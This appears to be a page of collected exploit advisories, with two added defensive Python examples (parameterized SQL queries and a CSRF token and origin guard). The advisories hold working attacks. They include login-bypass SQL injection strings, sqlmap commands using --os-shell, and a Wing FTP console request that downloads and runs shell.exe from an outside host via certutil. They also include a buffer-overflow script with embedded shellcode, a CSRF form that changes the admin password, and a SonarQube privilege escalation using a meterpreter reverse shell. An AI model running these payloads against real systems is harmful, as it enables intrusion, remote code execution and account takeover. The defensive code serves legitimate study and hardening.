Cookie: ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; .DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70; PHPSESSID=1gpgmmltf6uk3ju3aakgd0s8m5
Connection: close

myusername=' or 1=1#&mypassword=ad&Submit=Login
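The three PHP login handlers on this page (Park Ticketing index.php, the hotel-booking loginauth.php and this checklogin.php) fail the same way: the raw POST value is concatenated into the SQL string, so a quote in it ends the literal and a trailing comment discards the password clause. The following added example, not code from any of these projects, reproduces that query shape against a constructed in-memory SQLite table and puts the parameterized form beside it. SQLite stands in for MySQL, so the advisories' trailing MySQL `#` comment is written as `--` here; the table, accounts and passwords are constructed.

```python
import hashlib
import sqlite3


def make_db():
    """Constructed stand-in for the `tbadministrators` table that checklogin.php queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbadministrators (member_id INTEGER, email TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO tbadministrators VALUES (?, ?, ?)",
        [(1, "admin@example.invalid", hashlib.md5(b"correct horse").hexdigest()),
         (2, "audit@example.invalid", hashlib.md5(b"battery staple").hexdigest())])
    conn.commit()
    return conn


def login_vulnerable(conn, myusername, mypassword, single_row=True):
    """Mirrors the PHP: the POST value is spliced into the SQL text, so the caller
    controls the quoting. single_row=True is checklogin.php's $count==1 test;
    False is loginauth.php's mysql_num_rows($re) > 0 test."""
    encrypted = hashlib.md5(mypassword.encode()).hexdigest()
    sql = ("SELECT * FROM tbadministrators WHERE email='" + myusername
           + "' and password='" + encrypted + "'")
    n = len(conn.execute(sql).fetchall())
    return n == 1 if single_row else n > 0


def login_fixed(conn, myusername, mypassword):
    """Same check with a parameterized query: the values travel separately from
    the statement, so quotes and comment tokens inside them are just data."""
    encrypted = hashlib.md5(mypassword.encode()).hexdigest()
    rows = conn.execute(
        "SELECT * FROM tbadministrators WHERE email=? and password=?",
        (myusername, encrypted)).fetchall()
    return len(rows) == 1


# The page's payloads with MySQL's '#' replaced by SQLite's '--' comment token.
BYPASS_LIMIT1 = "1' or 1 = 1 LIMIT 1-- "   # hotel-booking payload
BYPASS_PLAIN = "' or 1=1-- "               # park-ticketing / polling payload

if __name__ == "__main__":
    db = make_db()
    # True: every row matches, and LIMIT 1 keeps the count at exactly one.
    print(login_vulnerable(db, BYPASS_LIMIT1, "anything"))
    # False only because both rows come back and the PHP insists on exactly one;
    # the '> 0' variant lets it through.
    print(login_vulnerable(db, BYPASS_PLAIN, "anything"))
    print(login_vulnerable(db, BYPASS_PLAIN, "anything", single_row=False))
    # False: the whole payload is compared as an email address.
    print(login_fixed(db, BYPASS_LIMIT1, "anything"))
```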
            
# Exploit Title: Joomla! J2 JOBS 1.3.0 - 'sortby' Authenticated SQL Injection
# Date: 2020-06-17
# Exploit Author: Mehmet Kelepçe / Gais Cyber Security
# Vendor Homepage: https://joomsky.com/
# Software Link: https://joomsky.com/products/js-jobs-pro.html
# Change Log (Update) : https://joomsky.com/products/js-jobs.html
# Version: 1.3.0
# Tested on: Kali Linux - Apache2

Vulnerable param: sortby
-------------------------------------------------------------------------
POST /joomla/administrator/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/joomla/administrator/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Connection: close
Cookie: COOKIES
Upgrade-Insecure-Requests: 1

js_sortby=4&companyname=12&jobtitle=12&location=12&jobcategory=&jobtype=&datefrom=&dateto=&option=com_jsjobs&task=&c=job&view=job&callfrom=jobqueue&layout=jobqueue&sortby=asc&my_click=&boxchecked=0&d90ced5aa929447644f09b56c8d8ba12=1


-------------------------------------------------------------------------
sqlmap poc:

sqlmap -r jsjobs --dbs --risk=3 --level=5 --random-agent -p sortby


Mehmet KELEPÇE

Penetration Tester | Red Team
            
# Exploit Title: Infor Storefront B2B 1.0 - 'usr_name' SQL Injection
# Google Dork: inurl:storefrontb2bweb
# Date: 2020-06-27
# Exploit Author: ratboy
# Vendor Homepage: https://www.insitesoft.com/infor-storefront/
# Version: Infor Storefront
# Tested on: Windows All Versions

[POC Multiple Vulns]

python sqlmap.py -u "http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass" -p usr_name --dbms=mssql --level=5 --risk=3 --tamper=between,space2comment -o --random-agent --parse-errors --os-shell --technique=ES


python sqlmap.py -u "http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1" -p itm_id --dbms=mssql --level=5 --risk=3 --tamper=between,space2comment -o --random-agent --parse-errors --os-shell --technique=ES


or...

http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass'[SQL INJECTION];--

http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1'[SQL INJECTION];--



-- 
Sincerely,
Aaron Schrom
            
# Exploit Title: Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated)
# Date: 2020-06-26
# Exploit Author: v1n1v131r4
# Vendor Homepage: https://www.wftpserver.com/
# Software Link: https://www.wftpserver.com/download.htm
# Version: 6.3.8
# Tested on: Windows 10
# CVE : --

Wing FTP Server has a web console based on the Lua language. For authenticated users, this console can be exploited to obtain a reverse shell.

1) Generate your payload (e.g. msfvenom)
2) Send and execute via POST

POST /admin_lua_.html?r=0.3592753444724336 HTTP/1.1
Host: 192.168.56.105:5466
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.105:5466/admin_lua_term.html
Content-Type: text/plain;charset=UTF-8
Content-Length: 153
Connection: close
Cookie: admin_lang=english; admin_login_name=admin; UIDADMIN=75e5058fb61a81e427ae86f55794f1f5

command=os.execute('cmd.exe%20%2Fc%20certutil.exe%20-urlcache%20-split%20-f%20http%3A%2F%2F192.168.56.103%2Fshell.exe%20c%3A%5Cshell.exe%20%26shell.exe')
            
# Exploit Title: Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC) 
# Exploit Author: PovlTekstTV
# Date: 2020-07-15
# Vulnerable Software: Simple Startup Manager
# Software Link Download: http://www.ashkon.com/download/startup-manager.exe
# Version: 1.17
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 and 64 bit)
# DEP and ASLR Disabled on system
# Space for shellcode: 264

#!/usr/bin/python
# Two sets of instructions are needed:
# 1. JMP EDI
# 2. JMP EBX 
# I found these in the OS module SETUPAPI.dll, which is usually protected using ASLR.
# The exploit will probably not work unless changed/bruteforced.

# It is also possible to overwrite the SEH-handler with 600+ bytes,
# however I did not find any POP, POP, RETs.

# Walkthrough:
#   1.- Run the python script, it will create a new file "exploit.txt"
#   2.- Copy the content of the new file 'exploit.txt' to clipboard
#   3.- Turn off DEP for startup-manger.exe
#   4.- Open 'startup-manger.exe'
#   5.- Click 'New' or go to 'File' and click 'New'
#   6.- Paste content from clipboard into 'File' parameter
#   7.- Click on 'OK'
#   8.- Calc.exe runs.

#Identified the following badchars: x00 x0a x09 x0c x0d x3a x5c
#msfvenom -p windows/exec cmd=calc.exe -f c -b "\x00\x0a\x0c\x0d\x3a\x5c"
shellcode = ("\xdb\xd0\xd9\x74\x24\xf4\xbe\xcb\xe3\xc2\xa5\x5a\x33\xc9\xb1"
"\x31\x83\xc2\x04\x31\x72\x14\x03\x72\xdf\x01\x37\x59\x37\x47"
"\xb8\xa2\xc7\x28\x30\x47\xf6\x68\x26\x03\xa8\x58\x2c\x41\x44"
"\x12\x60\x72\xdf\x56\xad\x75\x68\xdc\x8b\xb8\x69\x4d\xef\xdb"
"\xe9\x8c\x3c\x3c\xd0\x5e\x31\x3d\x15\x82\xb8\x6f\xce\xc8\x6f"
"\x80\x7b\x84\xb3\x2b\x37\x08\xb4\xc8\x8f\x2b\x95\x5e\x84\x75"
"\x35\x60\x49\x0e\x7c\x7a\x8e\x2b\x36\xf1\x64\xc7\xc9\xd3\xb5"
"\x28\x65\x1a\x7a\xdb\x77\x5a\xbc\x04\x02\x92\xbf\xb9\x15\x61"
"\xc2\x65\x93\x72\x64\xed\x03\x5f\x95\x22\xd5\x14\x99\x8f\x91"
"\x73\xbd\x0e\x75\x08\xb9\x9b\x78\xdf\x48\xdf\x5e\xfb\x11\xbb"
"\xff\x5a\xff\x6a\xff\xbd\xa0\xd3\xa5\xb6\x4c\x07\xd4\x94\x1a"
"\xd6\x6a\xa3\x68\xd8\x74\xac\xdc\xb1\x45\x27\xb3\xc6\x59\xe2"
"\xf0\x39\x10\xaf\x50\xd2\xfd\x25\xe1\xbf\xfd\x93\x25\xc6\x7d"
"\x16\xd5\x3d\x9d\x53\xd0\x7a\x19\x8f\xa8\x13\xcc\xaf\x1f\x13"
"\xc5\xd3\xfe\x87\x85\x3d\x65\x20\x2f\x42")

payload = shellcode
payload += ("A"*(268-len(payload)-4))
payload += ("\xe4\xa9\x4e\x76") #0x764ea9e4 (JMP EBX) {PAGE_READONLY} [SETUPAPI.dll]
payload += ("\x5f\xbc\x4e\x76") #0x764ebc5f (JMP EDI) {PAGE_READONLY} [SETUPAPI.dll]

#Write payload to file
file = open("exploit.txt" , 'w')
file.write(payload)
file.close()
            
# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password)
# Date: 2020-05-31
# Exploit Author: Noth
# Vendor Homepage: https://github.com/boiteasite/cmsuno
# Software Link: https://github.com/boiteasite/cmsuno
# Version: v1.6
# CVE : 2020-15600

An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password.

PoC : 

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/cmsuno-master/uno.php" method="POST">
<input type="hidden" name="user" value="admin"/>
<input type="hidden" name="pass" value="yourpassword"/>
<input type="submit" name="user" value="Submit request"/>
</form>
</body>
</html>
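Both CSRF PoCs on this page (the SuperMicro config_user.cgi form earlier and this uno.php form) work because the browser attaches the victim's session cookie to a form submitted from any origin, so the cookie alone proves nothing about where the request came from. The following added example, not code from Supermicro, CMSUno or the advisory authors, shows the two server-side checks that defeat such a form: a per-session synchronizer token and an Origin/Referer comparison. The site origin, session id and attacker origin are constructed; the POST fields are those of the SuperMicro PoC (its &#95; entities decode to '_').

```python
import hmac
import secrets
from urllib.parse import urlsplit


class CsrfGuard:
    """Two independent checks for a state-changing request such as a POST to
    cgi/config_user.cgi or uno.php. Either one alone defeats the PoC forms; setting
    the session cookie with SameSite=Lax or Strict is a third, browser-side layer."""

    def __init__(self, site_origin):
        self.site_origin = site_origin   # scheme://host[:port] of the management UI
        self._tokens = {}                # session id -> token (in-memory stand-in for session storage)

    def issue_token(self, session_id):
        """Called when rendering the form; the token is embedded as a hidden field."""
        token = secrets.token_urlsafe(32)
        self._tokens[session_id] = token
        return token

    def _origin_ok(self, headers):
        # Browsers send Origin on cross-site POSTs; fall back to Referer, and treat
        # the absence of both as untrusted for state changes.
        source = headers.get("Origin") or headers.get("Referer")
        if not source:
            return False
        parts = urlsplit(source)
        return f"{parts.scheme}://{parts.netloc}".lower() == self.site_origin.lower()

    def allow(self, session_id, headers, form):
        """Return (allowed, reason) for a parsed POST body and its request headers."""
        if not self._origin_ok(headers):
            return False, "origin/referer does not match the site"
        expected = self._tokens.get(session_id)
        supplied = form.get("csrf_token", "")
        # compare_digest keeps the comparison constant-time regardless of mismatch position.
        if expected is None or not hmac.compare_digest(expected.encode(), supplied.encode()):
            return False, "missing or invalid CSRF token"
        return True, "ok"


# Constructed scenario: the BMC origin and the body the SuperMicro PoC form submits.
SITE = "https://bmc.example.invalid"
POC_FORM = {"username": "JOKER", "original_username": "2",
            "password": "onebadday", "new_privilege": "4"}


def demo():
    """Returns (forged_allowed, legit_allowed, guessed_token_allowed)."""
    guard = CsrfGuard(SITE)
    sid = "session-cookie-of-victim"   # constructed session id
    token = guard.issue_token(sid)
    # 1. The PoC page on another origin: cookie present, no token, foreign Origin.
    forged = guard.allow(sid, {"Origin": "https://attacker.example.invalid"}, POC_FORM)
    # 2. The same fields submitted from the real UI together with its token.
    legit = guard.allow(sid, {"Origin": SITE}, {**POC_FORM, "csrf_token": token})
    # 3. Right origin but a guessed token: still rejected.
    guessed = guard.allow(sid, {"Origin": SITE}, {**POC_FORM, "csrf_token": "x" * 43})
    return forged[0], legit[0], guessed[0]


if __name__ == "__main__":
    print(demo())   # (False, True, False)
```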
            
# Title: Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path
# Author: Velayutham Selvaraj
# Date: 2020-06-03
# Vendor Homepage: https://www.sonarqube.org
# Software Link: https://www.sonarqube.org/downloads/
# Version : 8.3.1
# Tested on: Windows 10 64bit(EN)

About Unquoted Service Path :
==============================

When a service is created whose executable path contains spaces and isn't
enclosed within quotes, this leads to a vulnerability known as Unquoted
Service Path, which allows a user to gain SYSTEM privileges (only if the
vulnerable service is running with SYSTEM privilege level, which most of
the time it is).

Steps to recreate :
=============================

1.  Open CMD and check for a USP vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
2.  The vulnerable service would show up.
3.  Check the service permissions by typing [ sc qc SonarQube ]
4.  The command would return..

C:\Users\HP-840-G2-ELITEBOOK>sc qc SonarQube
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SonarQube
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\bin\windows-x86-64\wrapper.exe -s C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\conf\wrapper.conf
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SonarQube
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

5.  This confirms that the service is running as SYSTEM, the highest privilege on the machine.
6.  Now create a payload with msfvenom or another tool and name it wrapper.exe.
7.  Make sure you have write permissions to where you downloaded it. I kept it in the Downloads folder but confirmed it in Program Files as well.
8.  Provided that you have the right permissions, drop the wrapper.exe executable you created into the "C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\bin\windows-x86-64\" directory.
9.  Now restart the SonarQube service by giving the command [ sc stop SonarQube ] followed by [ sc start SonarQube ].
10. If your payload is created with msfvenom, quickly migrate to a different process. [Any process, since you have SYSTEM privilege].

During my testing :

Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o wrapper.exe
Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a
different Process ]